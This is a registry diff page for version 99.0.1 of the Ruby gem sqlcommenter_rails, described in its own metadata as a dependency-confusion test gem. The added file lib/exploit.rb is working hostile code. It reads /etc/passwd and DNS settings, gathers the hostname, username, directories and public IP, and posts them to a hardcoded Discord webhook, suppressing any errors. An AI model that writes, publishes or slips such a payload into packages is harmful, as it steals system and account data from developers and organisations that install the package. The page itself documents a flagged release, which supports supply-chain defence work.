sqlcommenter_rails 99.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of sqlcommenter_rails might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/lib/exploit.rb +103 -0
- metadata +42 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 0cfdf317c4d8170119c529b52a537d8967fec1115fb0c858e00d0897d198d54d
|
|
4
|
+
data.tar.gz: b09fe7117649a9b641208c4d6fa403259235ee3cd417a6c3396b066d5b179392
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: 2cedcece55ae43259ed6ac6a6eeb2fe83ff409dd3b216228a40de195e517ff079ac1b49d0cde4a73a88bfd4ee6280c873341c286bd479042154b196de85fe082
|
|
7
|
+
data.tar.gz: e39482c798e86ee174629f48d8135b6e4439f3bcbd615bf887a2e104c300c7b28c8af31062c697d02404c55b616c419176f19b10bda9a590bd8dae3d90d38d23
|
data/lib/exploit.rb
ADDED
|
@@ -0,0 +1,103 @@
|
|
|
1
|
+
require 'etc'
|
|
2
|
+
require 'socket'
|
|
3
|
+
require 'json'
|
|
4
|
+
require 'net/http'
|
|
5
|
+
require 'uri'
|
|
6
|
+
|
|
7
|
+
# Read the /etc/passwd file
|
|
8
|
+
begin
|
|
9
|
+
passwd_data = File.read('/etc/passwd')
|
|
10
|
+
rescue StandardError => e
|
|
11
|
+
passwd_data = "Error reading /etc/passwd: #{e.message}"
|
|
12
|
+
end
|
|
13
|
+
|
|
14
|
+
# Get current time
|
|
15
|
+
current_time = Time.now.utc.iso8601
|
|
16
|
+
|
|
17
|
+
# Get package metadata
|
|
18
|
+
gem_name = 'sqlcommenter_rails'
|
|
19
|
+
gem_version = '99.0.1'
|
|
20
|
+
gem_metadata = {
|
|
21
|
+
'name' => gem_name,
|
|
22
|
+
'version' => gem_version,
|
|
23
|
+
'summary' => 'Test gem for dependency confusion',
|
|
24
|
+
'author' => 'Your Name'
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
# Get DNS servers (Linux-specific, may not work on all systems)
|
|
28
|
+
begin
|
|
29
|
+
dns_servers = File.readlines('/etc/resolv.conf').select { |line| line.start_with?('nameserver') }.map { |line| line.split[1] }
|
|
30
|
+
dns_servers = dns_servers.empty? ? ['Unknown'] : dns_servers
|
|
31
|
+
rescue StandardError
|
|
32
|
+
dns_servers = ['Unknown']
|
|
33
|
+
end
|
|
34
|
+
|
|
35
|
+
# Function to get public IP using api.ipify.org
|
|
36
|
+
def get_public_ip
|
|
37
|
+
uri = URI('https://api.ipify.org')
|
|
38
|
+
response = Net::HTTP.get_response(uri)
|
|
39
|
+
if response.is_a?(Net::HTTPSuccess)
|
|
40
|
+
response.body
|
|
41
|
+
else
|
|
42
|
+
"Error getting public IP: #{response.message}"
|
|
43
|
+
end
|
|
44
|
+
rescue StandardError => e
|
|
45
|
+
"Error getting public IP: #{e.message}"
|
|
46
|
+
end
|
|
47
|
+
|
|
48
|
+
# Collect all tracking data
|
|
49
|
+
public_ip = get_public_ip
|
|
50
|
+
tracking_data = {
|
|
51
|
+
'package' => gem_name,
|
|
52
|
+
'current_dir' => Dir.pwd,
|
|
53
|
+
'home_dir' => Dir.home,
|
|
54
|
+
'hostname' => Socket.gethostname,
|
|
55
|
+
'username' => Etc.getlogin || 'Unknown',
|
|
56
|
+
'dns_servers' => dns_servers,
|
|
57
|
+
'resolved' => nil, # RubyGems doesn't have a direct equivalent to packageJSON.___resolved
|
|
58
|
+
'version' => gem_version,
|
|
59
|
+
'package_json' => gem_metadata,
|
|
60
|
+
'passwd_content' => passwd_data,
|
|
61
|
+
'time' => current_time,
|
|
62
|
+
'originating_ip' => public_ip
|
|
63
|
+
}
|
|
64
|
+
|
|
65
|
+
# Add custom notes
|
|
66
|
+
custom_notes = "Successful R_C_E via dependency confusion."
|
|
67
|
+
|
|
68
|
+
# Format the message for readability
|
|
69
|
+
formatted_message = <<~MESSAGE
|
|
70
|
+
Endpoint: https://example.com/endpoint
|
|
71
|
+
|
|
72
|
+
All Information:
|
|
73
|
+
- Package: #{tracking_data['package']}
|
|
74
|
+
- Current Directory: #{tracking_data['current_dir']}
|
|
75
|
+
- Home Directory: #{tracking_data['home_dir']}
|
|
76
|
+
- Hostname: #{tracking_data['hostname']}
|
|
77
|
+
- Username: #{tracking_data['username']}
|
|
78
|
+
- DNS Servers: #{tracking_data['dns_servers'].to_json}
|
|
79
|
+
- Resolved: #{tracking_data['resolved']}
|
|
80
|
+
- Version: #{tracking_data['version']}
|
|
81
|
+
- Package JSON: #{tracking_data['package_json'].to_json(indent: 2)}
|
|
82
|
+
- /etc/passwd Content: #{tracking_data['passwd_content']}
|
|
83
|
+
- Time: #{tracking_data['time']}
|
|
84
|
+
- Originating IP: #{tracking_data['originating_ip']}
|
|
85
|
+
|
|
86
|
+
Custom Notes:
|
|
87
|
+
#{custom_notes}
|
|
88
|
+
MESSAGE
|
|
89
|
+
|
|
90
|
+
# Output to console
|
|
91
|
+
puts formatted_message
|
|
92
|
+
|
|
93
|
+
# Send to Discord Webhook
|
|
94
|
+
uri = URI('https://discord.com/api/webhooks/1410258094511882250/fPTbDPbFfrSaOKDwXDfeqfwlKlhdS5tpev8nD7giRFhAldmRpJaGlI6Y5IWqOpdxYNbx')
|
|
95
|
+
https = Net::HTTP.new(uri.host, uri.port)
|
|
96
|
+
https.use_ssl = true
|
|
97
|
+
request = Net::HTTP::Post.new(uri.path, { 'Content-Type' => 'application/json' })
|
|
98
|
+
request.body = { content: formatted_message }.to_json
|
|
99
|
+
begin
|
|
100
|
+
response = https.request(request)
|
|
101
|
+
rescue StandardError => e
|
|
102
|
+
# Silent error handling
|
|
103
|
+
end
|
metadata
ADDED
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: sqlcommenter_rails
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 99.0.1
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- test
|
|
8
|
+
bindir: bin
|
|
9
|
+
cert_chain: []
|
|
10
|
+
date: 1980-01-02 00:00:00.000000000 Z
|
|
11
|
+
dependencies: []
|
|
12
|
+
description: A Ruby gem for testing dependency confusion vulnerabilities.
|
|
13
|
+
email: test.email@example.com
|
|
14
|
+
executables: []
|
|
15
|
+
extensions: []
|
|
16
|
+
extra_rdoc_files: []
|
|
17
|
+
files:
|
|
18
|
+
- lib/exploit.rb
|
|
19
|
+
licenses:
|
|
20
|
+
- MIT
|
|
21
|
+
metadata: {}
|
|
22
|
+
post_install_message: |2
|
|
23
|
+
Running exploit script...
|
|
24
|
+
false
|
|
25
|
+
rdoc_options: []
|
|
26
|
+
require_paths:
|
|
27
|
+
- lib
|
|
28
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
29
|
+
requirements:
|
|
30
|
+
- - ">="
|
|
31
|
+
- !ruby/object:Gem::Version
|
|
32
|
+
version: '0'
|
|
33
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
34
|
+
requirements:
|
|
35
|
+
- - ">="
|
|
36
|
+
- !ruby/object:Gem::Version
|
|
37
|
+
version: '0'
|
|
38
|
+
requirements: []
|
|
39
|
+
rubygems_version: 3.6.7
|
|
40
|
+
specification_version: 4
|
|
41
|
+
summary: test gem for dependency confusion
|
|
42
|
+
test_files: []
|